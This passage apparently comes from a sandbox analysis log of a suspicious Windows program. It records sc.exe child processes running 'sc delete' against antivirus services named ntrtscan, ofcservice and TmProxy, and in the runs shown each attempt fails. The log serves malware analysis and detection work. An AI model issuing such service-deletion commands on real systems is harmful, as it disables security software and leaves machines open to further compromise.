0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1490 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1750 start_va = 0x95daeb0000 end_va = 0x95dafaffff entry_point = 0x0 region_type = private name = "private_0x00000095daeb0000" filename = "" Region: id = 1751 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1752 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5562 start_va = 0x95dacf0000 end_va = 0x95dacfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000095dacf0000" filename = "" Region: id = 5563 start_va = 0x95dad00000 end_va = 0x95dad06fff entry_point = 0x0 region_type = private name = "private_0x00000095dad00000" filename = "" Region: id = 5564 start_va = 0x95dade0000 end_va = 0x95dae9dfff entry_point = 0x95dade0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5565 start_va = 0x95dafb0000 end_va = 0x95db02ffff entry_point = 0x0 region_type = private name = "private_0x00000095dafb0000" filename = "" Region: id = 5566 start_va = 0x95db100000 end_va = 0x95db10ffff entry_point = 0x0 region_type = private name = "private_0x00000095db100000" filename = "" Region: id = 5567 start_va = 0x7ff67a610000 end_va = 0x7ff67a70ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a610000" filename = "" Region: id = 5568 start_va = 0x7ff67a73c000 end_va = 0x7ff67a73dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a73c000" filename = "" Region: id = 5569 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5570 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5575 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5576 start_va = 0x95daea0000 end_va = 0x95daea6fff entry_point = 0x0 region_type = private name = "private_0x00000095daea0000" filename = "" Region: id = 5577 start_va = 0x95db110000 end_va = 0x95db1eefff entry_point = 0x95db110000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5578 start_va = 0x95db030000 end_va = 0x95db041fff entry_point = 0x95db030000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 103 os_tid = 0xe30 [0079.923] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0079.923] __set_app_type (_Type=0x1) [0079.923] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0079.923] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0079.924] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.992] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.993] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.993] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.993] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.993] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.993] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.993] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.993] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.993] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.993] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.993] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.993] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.993] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.993] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.993] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.993] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.993] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.993] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.993] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.993] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.993] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.993] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.995] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x95daeb8ce0 [0079.999] OpenServiceW (hSCManager=0x95daeb8ce0, lpServiceName="TmProxy", dwDesiredAccess=0x10000) returned 0x0 [0079.999] GetLastError () returned 0x424 [0080.000] _ultow (in: _Dest=0x424, _Radix=-623183112 | out: _Dest=0x424) returned="1060" [0080.000] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0080.001] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x95dadafab0, nSize=0x2, Arguments=0x95dadafae0 | out: lpBuffer="鎰\x95") returned 0x62 [0080.001] GetFileType (hFile=0x24) returned 0x2 [0080.001] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x95dadafa60 | out: lpMode=0x95dadafa60) returned 1 [0080.014] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x95daeb93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x95dadafa58, lpReserved=0x0 | out: lpBuffer=0x95daeb93b0*, lpNumberOfCharsWritten=0x95dadafa58*=0x62) returned 1 [0080.014] LocalFree (hMem=0x95daeb93b0) returned 0x0 [0080.014] LocalFree (hMem=0x0) returned 0x0 [0080.014] CloseServiceHandle (hSCObject=0x95daeb8ce0) returned 1 [0080.015] LocalFree (hMem=0x0) returned 0x0 [0080.015] exit (_Code=1060) Thread: id = 358 os_tid = 0x1368 Process: id = "76" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf13a000" os_pid = "0xe34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"ntrtscan\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1491 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1492 start_va = 0xebc0a70000 end_va = 0xebc0a8ffff entry_point = 0x0 region_type = private name = "private_0x000000ebc0a70000" filename = "" Region: id = 1493 start_va = 0xebc0a90000 end_va = 0xebc0aa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ebc0a90000" filename = "" Region: id = 1494 start_va = 0xebc0ab0000 end_va = 0xebc0b2ffff entry_point = 0x0 region_type = private name = "private_0x000000ebc0ab0000" filename = "" Region: id = 1495 start_va = 0xebc0b30000 end_va = 0xebc0b33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ebc0b30000" filename = "" Region: id = 1496 start_va = 0xebc0b40000 end_va = 0xebc0b40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ebc0b40000" filename = "" Region: id = 1497 start_va = 0xebc0b50000 end_va = 0xebc0b51fff entry_point = 0x0 region_type = private name = "private_0x000000ebc0b50000" filename = "" Region: id = 1498 start_va = 0x7df5ffe90000 end_va = 0x7ff5ffe8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe90000" filename = "" Region: id = 1499 start_va = 0x7ff67ac40000 end_va = 0x7ff67ac62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ac40000" filename = "" Region: id = 1500 start_va = 0x7ff67ac64000 end_va = 0x7ff67ac64fff entry_point = 0x0 region_type = private name = "private_0x00007ff67ac64000" filename = "" Region: id = 1501 start_va = 0x7ff67ac6e000 end_va = 0x7ff67ac6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67ac6e000" filename = "" Region: id = 1502 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1503 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1753 start_va = 0xebc0bd0000 end_va = 0xebc0ccffff entry_point = 0x0 region_type = private name = "private_0x000000ebc0bd0000" filename = "" Region: id = 1754 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1755 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5010 start_va = 0xebc0a70000 end_va = 0xebc0a7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ebc0a70000" filename = "" Region: id = 5011 start_va = 0xebc0a80000 end_va = 0xebc0a86fff entry_point = 0x0 region_type = private name = "private_0x000000ebc0a80000" filename = "" Region: id = 5012 start_va = 0xebc0b80000 end_va = 0xebc0b8ffff entry_point = 0x0 region_type = private name = "private_0x000000ebc0b80000" filename = "" Region: id = 5013 start_va = 0xebc0cd0000 end_va = 0xebc0d8dfff entry_point = 0xebc0cd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5014 start_va = 0xebc0d90000 end_va = 0xebc0e0ffff entry_point = 0x0 region_type = private name = "private_0x000000ebc0d90000" filename = "" Region: id = 5015 start_va = 0x7ff67ab40000 end_va = 0x7ff67ac3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ab40000" filename = "" Region: id = 5016 start_va = 0x7ff67ac6c000 end_va = 0x7ff67ac6dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67ac6c000" filename = "" Region: id = 5017 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5018 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5025 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5026 start_va = 0xebc0b60000 end_va = 0xebc0b66fff entry_point = 0x0 region_type = private name = "private_0x000000ebc0b60000" filename = "" Region: id = 5027 start_va = 0xebc0e10000 end_va = 0xebc0eeefff entry_point = 0xebc0e10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5028 start_va = 0xebc0b90000 end_va = 0xebc0ba1fff entry_point = 0xebc0b90000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 104 os_tid = 0xe38 [0074.615] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0074.615] __set_app_type (_Type=0x1) [0074.615] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0074.615] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0074.616] SetThreadUILanguage (LangId=0x0) returned 0x409 [0074.832] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0074.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0074.832] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0074.832] _wcsicmp (_String1="delete", _String2="query") returned -13 [0074.832] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0074.832] _wcsicmp (_String1="delete", _String2="start") returned -15 [0074.832] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0074.832] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0074.832] _wcsicmp (_String1="delete", _String2="control") returned 1 [0074.832] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0074.832] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0074.832] _wcsicmp (_String1="delete", _String2="config") returned 1 [0074.832] _wcsicmp (_String1="delete", _String2="description") returned -7 [0074.832] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0074.832] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0074.832] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0074.832] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0074.832] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0074.833] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0074.833] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0074.833] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0074.833] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0074.833] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0074.833] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0074.833] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0074.834] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xebc0bd8da0 [0074.838] OpenServiceW (hSCManager=0xebc0bd8da0, lpServiceName="ntrtscan", dwDesiredAccess=0x10000) returned 0x0 [0074.839] GetLastError () returned 0x424 [0074.839] _ultow (in: _Dest=0x424, _Radix=-1062012440 | out: _Dest=0x424) returned="1060" [0074.839] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0074.840] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xebc0b2f9a0, nSize=0x2, Arguments=0xebc0b2f9d0 | out: lpBuffer="鎰삽ë") returned 0x62 [0074.840] GetFileType (hFile=0x24) returned 0x2 [0074.840] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xebc0b2f950 | out: lpMode=0xebc0b2f950) returned 1 [0074.940] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xebc0bd93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xebc0b2f948, lpReserved=0x0 | out: lpBuffer=0xebc0bd93b0*, lpNumberOfCharsWritten=0xebc0b2f948*=0x62) returned 1 [0074.940] LocalFree (hMem=0xebc0bd93b0) returned 0x0 [0074.940] LocalFree (hMem=0x0) returned 0x0 [0074.940] CloseServiceHandle (hSCObject=0xebc0bd8da0) returned 1 [0074.941] LocalFree (hMem=0x0) returned 0x0 [0074.941] exit (_Code=1060) Thread: id = 321 os_tid = 0x1244 Process: id = "77" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x78dff000" os_pid = "0xe3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"ofcservice\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1504 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1505 start_va = 0xcb9c2e0000 end_va = 0xcb9c2fffff entry_point = 0x0 region_type = private name = "private_0x000000cb9c2e0000" filename = "" Region: id = 1506 start_va = 0xcb9c300000 end_va = 0xcb9c313fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb9c300000" filename = "" Region: id = 1507 start_va = 0xcb9c320000 end_va = 0xcb9c39ffff entry_point = 0x0 region_type = private name = "private_0x000000cb9c320000" filename = "" Region: id = 1508 start_va = 0xcb9c3a0000 end_va = 0xcb9c3a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb9c3a0000" filename = "" Region: id = 1509 start_va = 0xcb9c3b0000 end_va = 0xcb9c3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb9c3b0000" filename = "" Region: id = 1510 start_va = 0xcb9c3c0000 end_va = 0xcb9c3c1fff entry_point = 0x0 region_type = private name = "private_0x000000cb9c3c0000" filename = "" Region: id = 1511 start_va = 0x7df5ff4a0000 end_va = 0x7ff5ff49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff4a0000" filename = "" Region: id = 1512 start_va = 0x7ff67aa50000 end_va = 0x7ff67aa72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aa50000" filename = "" Region: id = 1513 start_va = 0x7ff67aa73000 end_va = 0x7ff67aa73fff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa73000" filename = "" Region: id = 1514 start_va = 0x7ff67aa7e000 end_va = 0x7ff67aa7ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa7e000" filename = "" Region: id = 1515 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1516 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1756 start_va = 0xcb9c5a0000 end_va = 0xcb9c69ffff entry_point = 0x0 region_type = private name = "private_0x000000cb9c5a0000" filename = "" Region: id = 1757 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1758 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5540 start_va = 0xcb9c2e0000 end_va = 0xcb9c2effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cb9c2e0000" filename = "" Region: id = 5541 start_va = 0xcb9c2f0000 end_va = 0xcb9c2f6fff entry_point = 0x0 region_type = private name = "private_0x000000cb9c2f0000" filename = "" Region: id = 5542 start_va = 0xcb9c3d0000 end_va = 0xcb9c48dfff entry_point = 0xcb9c3d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5543 start_va = 0xcb9c490000 end_va = 0xcb9c50ffff entry_point = 0x0 region_type = private name = "private_0x000000cb9c490000" filename = "" Region: id = 5544 start_va = 0xcb9c870000 end_va = 0xcb9c87ffff entry_point = 0x0 region_type = private name = "private_0x000000cb9c870000" filename = "" Region: id = 5545 start_va = 0x7ff67a950000 end_va = 0x7ff67aa4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a950000" filename = "" Region: id = 5546 start_va = 0x7ff67aa7c000 end_va = 0x7ff67aa7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa7c000" filename = "" Region: id = 5547 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5548 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5558 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5559 start_va = 0xcb9c510000 end_va = 0xcb9c516fff entry_point = 0x0 region_type = private name = "private_0x000000cb9c510000" filename = "" Region: id = 5560 start_va = 0xcb9c6a0000 end_va = 0xcb9c77efff entry_point = 0xcb9c6a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5561 start_va = 0xcb9c520000 end_va = 0xcb9c531fff entry_point = 0xcb9c520000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 105 os_tid = 0xe40 [0079.817] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0079.817] __set_app_type (_Type=0x1) [0079.817] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0079.817] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0079.817] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.878] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.878] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.878] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.878] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.878] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.878] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.878] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.878] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.878] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.878] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.879] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.879] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.879] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.879] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.879] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.879] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.879] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.879] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.879] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.879] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.879] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.879] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.879] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.879] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.879] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.880] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xcb9c5a8d70 [0079.885] OpenServiceW (hSCManager=0xcb9c5a8d70, lpServiceName="ofcservice", 